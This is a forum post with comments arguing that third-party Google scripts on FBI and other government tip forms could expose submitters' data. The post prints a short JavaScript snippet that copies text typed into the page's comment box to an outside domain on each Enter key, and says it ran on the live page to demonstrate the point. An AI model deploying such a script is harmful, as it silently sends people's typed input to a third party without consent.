5
0

FBI leaks all tips online to Google, endangering anyone who submits a tip


 invite response                
2018 Feb 2, 9:27am   6,846 views  37 comments

by Patrick   ➕follow (55)   💰tip   ignore  

Summary: our government agencies at both the state and federal level are irresponsibly giving Google access to what should be citizens' private information.

The FBI has a form for reporting tips, here:

https://tips.fbi.gov/

Unfortunately, that FBI form includes a recaptcha from Google, which is used to prove you are a human being and not a robot. It looks like this:



You can verify that the FBI tip site is loading the recaptcha script from Google and not from its own servers by doing a "view source" in your browser on the tips.fbi.gov page and seeing this:

src="https://www.google.com/recaptcha/api/challenge?k=6LfDkLwSAAAAAD4IfxM2UpXo_jrotbWHVPWLwZVN&hl=en"

Including that script gives Google the easy ability to capture all the tip data that anyone submits to the FBI. In addition to the tip itself, the leaked data includes:

Your First Name
Your Last Name
Your Middle Name
Your Phone
Your Email
Your Street 1
Your Street 2
Your Suite/Apt/Mail Stop
Your City
Your State

Even if you lie on the form about those things, it's not hard for Google to know who you really are from your IP address and your browser's make and model. Google most likely has an extensive profile of you already from your phone usage (if you have an Android phone) and from your searching and surfing habits online.

This is extremely bad for the privacy of people submitting tips to the FBI and could put their lives in danger.

To illustrate the danger, I wrote this little script:


document.addEventListener("DOMContentLoaded", function(event) {
path = document.getElementById('accept_comment').getAttribute('href')
textarea = document.querySelector('textarea')
textarea.onkeyup = function(evt) {
if (evt.keyCode == 13) { // return key
console.log('sending fbi tip back to evil spying company, ha ha ha!')
fetch('https://sftech.fun'/ + path,
{
method: 'POST',
mode: 'no-cors',
body: 'comment_post_id=1275699&comment_content=' + encodeURI(textarea.value)
})
}
}
})


Then I included it on this very page (do a 'view source' and look for spy_on_fbi.js) in just the same way that the FBI includes Google's recapta. My little script will spy on every comment entered on this page, and copy it over to a page on a different website of mine, at http://sftech.fun/post/1275699 It won't even wait until you submit a comment, but will copy over what you're writing in the comment box at the bottom of this page every time you hit the enter key.

(Note added Tue 20 Mar 2018: disabled the spying for now, since I took down sftech.fun to save money - still happy to illustrate the principle to interested reporters though. Write p@patrick.net )

Please tell reporters about this. Other government agencies are also unwittingly offering great quantities of personal information about you to Google by including Google scripts, such as:

https://www.coveredca.com/
http://www.edd.ca.gov/
https://www.ice.gov/webform/hsi-tip-form (leaking via Google analytics script)
(let me know about others you find)

Comments 1 - 37 of 37        Search these comments

1   MrMagic   2018 Feb 2, 9:32am  

Patrick says
So Google knows


I thought Google knows every time you touch your keyboard or touch screen?

Patrick says
This is extremely bad for the privacy of people


Very true!
2   Patrick   2018 Feb 2, 9:35am  

One way to get a bit of privacy is to add these lines to the /etc/hosts file on your Mac or Linux computer (probably there is some similar file on Windows):


## CUSTOM BLOCKING
127.0.0.1 google.com
127.0.0.1 www.google.com 127.0.0.1 ssl.google-analytics.com
127.0.0.1 google-analytics.com
127.0.0.1 www.google-analytics.com 127.0.0.1 maps.google.com
127.0.0.1 images.google.com
127.0.0.1 facebook.com
127.0.0.1 www.facebook.com 127.0.0.1 staticxx.facebook.com


What that does is direct all use of those Google and Facebook domains to 127.0.0.1, which is simply your own computer, aka "localhost".

You'll quickly discover just how many government sites are sending your info to Google and Facebook by finding that they don't work with those /etc/hosts settings.
3   anonymous   2018 Feb 2, 1:34pm  

You think that's bad, I can't log into patrick.net from my job, as google would find out where I work. I used a gmail account when you implemented the new login system as I didn't realize I'd have to authenticate all the hosts that I use to access this forum.
4   Patrick   2018 Feb 2, 1:47pm  

You can just comment anonymously, like you did just now. No account required.

I don't use Google Recaptchas, or any Google software, but YouTube videos embedded in posts or comments do come from Google because they own YouTube.
5   Patrick   2018 Feb 2, 1:58pm  

Please upvote this very story on HackerNews: https://news.ycombinator.com/item?id=16294534
6   WookieMan   2018 Feb 2, 2:01pm  

Patrick says
Please upvote this very story on HackerNews: https://news.ycombinator.com/item?id=16294534


Not sure if it's something on my end. Site loads, but no content or story.
7   Patrick   2018 Feb 2, 2:16pm  

Hmmm, interesting. I can see it when logged it to hackernews, but not in incognito mode. Not even when I search for it:

https://hn.algolia.com/?query=fbi&sort=byDate&prefix=false&page=0&dateRange=last24h&type=story

Maybe it has to pass some censor first?

Also please upvote this:

https://www.reddit.com/r/government/comments/7uv0ry/if_you_submit_a_tip_to_the_fbi_google_knows_about/
8   Patrick   2018 Feb 27, 9:18pm  

I updated this post to illustrate just how irresponsible the FBI is being. Now every time you hit enter in this comment box, the comment will be copied over to http://sftech.fun/post/1275699
9   anonymous   2018 Feb 28, 12:55am  

FYI there is a windows HOSTS file, you should start with this one: http://winhelp2002.mvps.org/hosts.htm
10   anonymous   2018 Feb 28, 6:39am  

WOW, I really love what you did with this post Patrick. I am smarter having read this. great job.
11   bob2356   2018 Feb 28, 10:25am  

rando says
One way to get a bit of privacy is to add these lines to the /etc/hosts file on your Mac or Linux computer (probably there is some similar file on Windows):


## CUSTOM BLOCKING
127.0.0.1 google.com
127.0.0.1 www.google.com 127.0.0.1 ssl.google-analytics.com
127.0.0.1 google-analytics.com
127.0.0.1 www.google-analytics.com 127.0.0.1 maps.google.com
127.0.0.1 images.google.com
127.0.0.1 facebook.com
127.0.0.1 www.facebook.com 127.0.0.1 staticxx.facebook.com


You can look atl web sites like http://someonewhocares.org/hosts/http://someonewhocares.org/hosts/ that provide host files that block all kinds of nasties like adware. My hosts file runs something like 20 pages.
12   Hircus   2018 Feb 28, 1:47pm  

I agree, google could modify their code to harvest said information, but they currently don't.

But, I'm not sure this is any more dangerous than using a computer period. If you use windows/linux/mac, on any day a software update can come in that will start harvesting everything you type, and send it back to their mothership. Same goes for every web browser - they can easily capture everything you do.

Whether it be adding such capturing code to recaptcha, the OS, or a browser, they would probably get away with it for a while until someone notices and sounds the alarm. But, the repercussions would be grave for any big US company like Google/Microsoft.

btw - for those who aren't software developers: most of the web includes code that is loaded from other websites (it's usually related to advertising, analytics, social media, and content sharing). They all have the power to do this - go rogue (delivering an on-the-fly software update that you have no clue occurred) and start harvesting everything you type and/or see on that page. Your anti-virus won't help. The state of web security is sad one, but it's reality.
13   Patrick   2018 Feb 28, 2:32pm  

goat says
I agree, google could modify their code to harvest said information, but they currently don't.


What makes you sure that they don't?

They have the means, the motive, and the opportunity.
14   Patrick   2019 Mar 25, 8:32pm  

Bumping this just because it's been more than a year and Google still has access to all tips submitted to the FBI tip site.
15   FortWayneAsNancyPelosiHaircut   2019 Mar 25, 8:34pm  

Sounds like FBI people know nothing about privacy. Government employees...
16   zzyzzx   2019 Mar 26, 7:45am  

Go to a public library, and use their computers to submit a tip.
17   Patrick   2019 Mar 26, 7:57am  

Yes, going to a library is a reasonable way to deal with this case.

Mostly, I just want to publicize the fact that our government is leaking private information to Google all the time, from most of their websites.
18   SunnyvaleCA   2019 Mar 26, 8:21am  

Hmm... I thought scripts loaded from a different domain than the main page are sandboxed so they can't see the data of the main page. Isn't this the whole "cross site scripting" vulnerability?
19   Tenpoundbass   2019 Mar 26, 8:25am  

There's no need for that, all that is needed is form obfuscation and encrypting the values using a session values with Ticks.
A bot can't post a form at a future date because their form names wont match to the current session tick value.
20   MisdemeanorRebel   2019 Mar 27, 7:19pm  

Newspeak being promulgated:

21   Ceffer   2019 Mar 28, 1:28am  

If I leave a tip on the FBI site that Herbert Hoover was really gay and blackmailed by the mafia, would my secret file get fatter?
22   Patrick   2022 Apr 12, 5:00pm  

https://reclaimthenet.org/government-websites-google-tracking-code/?source=patrick.net

So now a few other people are noticing Google Analytics on government websites. It's just the tip of the iceberg, and boy are they late to notice.
23   FortWayneAsNancyPelosiHaircut   2022 Apr 12, 5:22pm  

I'm not drunk, but I am about to submit a tip that Biden stole the election. I have all the videos from the trials saved, that's my evidence.
24   HeadSet   2022 Apr 13, 11:20am  

MisdemeanorRebel says
Newspeak being promulgated:


That is some strange reasoning they use here. They are essentially saying "Illegals are not a burden on SS, as illegals are effectively slaves."
25   FortWayneAsNancyPelosiHaircut   2022 Apr 13, 1:14pm  

FortWayneAsNancyPelosiHaircut says
I'm not drunk, but I am about to submit a tip that Biden stole the election. I have all the videos from the trials saved, that's my evidence.


submitted this yesterday. i doubt they'll contact me. upon submission there is a nice message saying that they don't contact most people for submitting tips. i recommend everyone files tips for "stolen election", let those people do actual work and not entrap random Americans for the shits and giggles.
26   Robber Baron Elite Scum   2022 Apr 13, 4:05pm  

Snitches deserve stitches

Even Google agrees
27   AmericanKulak   2022 Apr 13, 4:28pm  

HeadSet says
That is some strange reasoning they use here. They are essentially saying "Illegals are not a burden on SS, as illegals are effectively slaves."


The part they leave out is: Any and all amnesties make them qualify for Soc Sec, and Dems have been talking about this for years now. So all the 30-40 something unskilled workers getting busted backs and wearing out, will be on SS disability if the Dems possibly can.
28   stereotomy   2022 Apr 13, 4:47pm  

Robber Baron Elite Scum says
Snitches deserve stitches

Even Google agrees


He returns! I've been trying to channel you in your absence. So glad I can lay down the mantle.

Seriously, glad to see you back.
29   SunnyvaleCA   2022 Apr 13, 5:12pm  

Patrick says
Summary: our government agencies at both the state and federal level are irresponsibly giving Google access to what should be citizens' private information.

It's only fair... Google gives the government agencies access to all your private data (GMail, Google Docs, etc). One good deed deserves another and all that.
30   Patrick   2022 Apr 26, 1:00pm  

https://reclaimthenet.org/google-project-whose-data-collection-could-help-saudi-arabia-assassins/?source=patrick.net


Investors raise alarm on Google project whose data collection could help Saudi Arabia assassins

“The Saudi Arabian government will stop at no end to snuff out anyone who dares challenge their autocratic rule and human rights abuses,” said SumOfUs campaign director Rewan Al-Haddad.

“Google is sidestepping its own human rights standards in favor of growth and profits, and while that’s not necessarily shocking, it puts the lives of activists and dissidents in the region at serious risk,” Al-Haddad added. “A Google cloud center under Saudi’s jurisdiction would basically serve our sensitive data on a silver platter to Saudi’s top hitmen.”
31   Patrick   2022 Jun 18, 4:23pm  

https://reclaimthenet.org/meta-is-sued-for-collecting-data-on-hospital-patients/


Meta has been sued over allegations that sensitive medical data is shared secretly with Facebook when patients access the portals of some health-care centers.

The basis of the lawsuit is Pixel, a tracking tool owned by Facebook. The tool redirects patients’ private data without consent, which is a violation of state and federal laws, according to the lawsuit filed in a San Francisco federal court. The unidentified complainant is proposing a class action on behalf of millions.

https://docs.reclaimthenet.org/Doe-v-Meta-Platforms-FB-Tracking-Pixels.pdf


Similar to how most websites leak your data to Google via including Google apis. Even health sites and some banks.

Wonder if I could start a lawsuit about that.
32   1337irr   2022 Jun 18, 4:33pm  

You probably could Patrick. Have you ever been involved in any lawsuit/legal matter?

I somewhat was...they are expensive and scary.
33   Patrick   2022 Jun 18, 4:35pm  

Nothing outside of small claims. Given that Google is a rich company and has willfully and blatantly violated the privacy of billions of people, maybe some law firm would be interested.
34   1337irr   2022 Jun 18, 4:44pm  

Well, doesn't hurt to shop around if you have case. I am sure you could get something going.

I worked with a lawyer who want $25k to take the matter to court if needed, but a cease and desist letter sufficed.
35   Ceffer   2022 Jun 18, 7:09pm  

Can I report people or neighbors I don't like as being present in halls of Congress on Jan 6., just like the good ole days of Soviet Russia where even a whisper would get somebody gulag'd?
36   Misc   2022 Jun 19, 2:33am  

I am certain that Google and its affiliated governments/businesses would be able to come up with something on any lawyer/law firm that you can contact.
37   Patrick   2022 Jun 25, 5:16pm  

https://reclaimthenet.org/italian-regulator-rules-google-analytics-use-illegal/


Italian regulator rules Google Analytics use illegal
Not compatible with data protection laws.

Garante Privacy made this decision after examining the case involving a web publisher, Caffeina Media, who uses Google Analytics. The data in question reveals IP address, type of OS, browser details, language, and data and time of visit to the site.


They are severely understating the invasiveness of including 3rd party javascript, which can inherently read and change anything on the page.

Please register to comment:

api   best comments   contact   latest images   memes   one year ago   random   suggestions